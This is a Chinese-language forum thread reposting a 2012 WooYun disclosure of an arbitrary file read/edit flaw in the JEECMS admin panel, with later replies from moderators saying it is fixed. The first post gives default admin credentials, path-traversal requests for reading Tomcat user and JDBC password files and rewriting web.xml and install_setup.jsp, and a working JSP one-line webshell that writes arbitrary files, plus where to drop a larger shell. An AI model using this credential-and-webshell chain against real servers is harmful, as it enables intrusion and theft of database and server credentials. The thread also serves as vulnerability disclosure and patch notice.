主题 : JEECMS后台任意文件编辑漏洞and官方漏洞及拿shell
级别: 童生
UID: 25523
积分:31 加为好友
威望: 0 精华: 0
主题:2 回复:15
注册时间:2011-11-08
在线时长:0
1#   发表于:2012-04-02 23:31:37  IP:27.84.*.*
漏洞概要

缺陷编号: WooYun-2012-04030

漏洞标题: JEECMS后台任意文件编辑漏洞and官方漏洞及拿shell 

相关厂商: JEECMS

漏洞作者: 随风.潜入夜

提交时间: 2012-01-27

公开时间: 2012-01-27

漏洞类型: 任意文件遍历/下载

危害等级: 高

自评Rank: 15

漏洞状态: 未联系到厂商或者厂商积极忽略 

漏洞来源: http://www.wooyun.org

Tags标签: 任意文件读取利用默认后台JEECMS默认密码任意文件写入利用
漏洞详情

披露状态:

2012-01-27: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-01-27: 厂商已经主动忽略漏洞,细节向公众公开


简要描述:

JEECMS后台任意文件编辑漏洞以及官方的demo站、官方服务器安全问题

详细说明:

2.x后台:
 login/Jeecms.do
 3.x后台:
 jeeadmin/jeecms/index.do
 
默认账户:admin
 默认密码:password
 
获取tomcat密码:
 /jeeadmin/jeecms/template/v_edit.do?root=../../conf/&name=../../conf/tomcat-users.xml
 

获取JDBC数据库账号密码:
 /jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties
 JEECMS2.x版读取路径:
 admin/core/template/Com_edit.do?relPath=\../../../classes/jdbc.properties
 


修改web.xml取消对jsp的过滤:
 /jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml
 JEECMS2.x版读取路径:
 admin/core/template/Com_edit.do?relPath=\../../../web.xml
 


修改install/install_setup.jsp:
 /jeeadmin/jeecms/template/v_edit.do?root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp
 JEECMS2.x版读取路径:
 admin/core/template/Com_edit.do?relPath=\../../../../install\install_setup.jsp
 


插入Jsp一句话:
 <%
 if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter
 
("f"))).write(request.getParameter("t").getBytes());
 %>
 
修改后的一句话目录
 /install/install_setup.jsp
 
一句话连接成功后的jsp大马目录:
 /ma.jsp
 

漏洞*明:



修复方案:

修复:还是先修复下官方服务器吧、你懂的

版权声明:转载请注明来源 随风.潜入夜@乌云

--------------------------------------------------------------------------------

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:10 (WooYun评价)


来源:http://www.2cto.com/Article/201201/117694.html

网上看到,第一时间转发,希望对JEECMS的发展有帮助!
级别: 童生
UID: 23373
积分:27 加为好友
威望: 0 精华: 0
主题:1 回复:20
注册时间:2011-09-05
在线时长:0
2#   发表于:2012-04-03 02:06:31  IP:113.83.*.*
这个漏洞的前提是你能进得了后台
级别: 总版主
UID: 10736
积分:127225 加为好友
威望: 19 精华: 6
主题:155 回复:112543
注册时间:2010-09-08
在线时长:46.54
3#   发表于:2012-04-06 08:49:36  IP:218.60.*.*
你好,这bug已修复 http://bbs.jeecms.com/fabu/9162.jhtml
路漫漫其修远兮,吾将上下而求索!
级别: 超级版主
UID: 2
积分:2964 加为好友
威望: 24 精华: 5
主题:204 回复:1280
注册时间:2009-06-02
在线时长:282.1
4#   发表于:2012-04-06 08:59:33  IP:218.60.*.*
通过这个问题,还请jeecms广大用户及时关注jeecms官网动态,及时下载jeecms的bug修复包
朝闻道,夕死可矣。
级别: 商业授权用户
UID: 7608
积分:143 加为好友
威望: 0 精华: 0
主题:16 回复:86
注册时间:2010-06-06
在线时长:0.16
5#   发表于:2020-09-15 09:06:39  IP:1.192.*.*
回复第3楼
http://bbs.jeecms.com/fabu/9162.jhtml
级别: 论坛管理员
UID: 122721
积分:57176 加为好友
威望: 2 精华: 1
主题:5 回复:49529
注册时间:2018-05-07
在线时长:398.43
6#   发表于:2020-09-15 09:13:10  IP:182.237.*.*
回复第5楼
每天告诉自己一次,“我真的很不错”。
1 共1页